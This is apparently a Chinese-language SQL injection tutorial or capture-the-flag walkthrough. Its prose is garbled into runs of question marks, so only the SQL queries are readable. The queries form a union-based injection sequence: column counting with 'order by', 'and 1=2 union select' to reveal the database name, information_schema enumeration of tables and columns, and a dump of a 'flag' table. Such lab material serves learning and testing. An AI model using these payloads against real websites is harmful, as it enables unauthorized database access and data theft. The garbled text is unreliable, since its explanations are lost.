??????????????????????????????????????SQL?????????????select * from news where id=1 order by 1???????????????????????????
?????????????????????SQL??? select * from news where id=1 and 1=2 union select 1,database()
union?????????database()?????????????????????????????? ????????????????group_concat????columns?????????????????????????? select * from news where id=1 and 1=2 union select 1,group_concat(column_name) from information_schema.columns where table_name='flag'
????????????information_schema???????????????????????????????????? select * from information_schema.tables where table_schema='sqli'
group_concat?????????????????????????? union?????union????????????????????????SELECT??????????????????????????????????? select * from news where id=1 and 1=2 union select 1,database()
??????????????????SQL??? select * from information_schema.databases
????????????????????? select count(*) from information_schema.tables where table_schema='sqli'
??????????????????????? select table_name from information_schema.tables where table_schema='sqli'
????????????????? select column_name from information_schema.columns where table_name='flag'
??????????????????????? select * from sqli.flag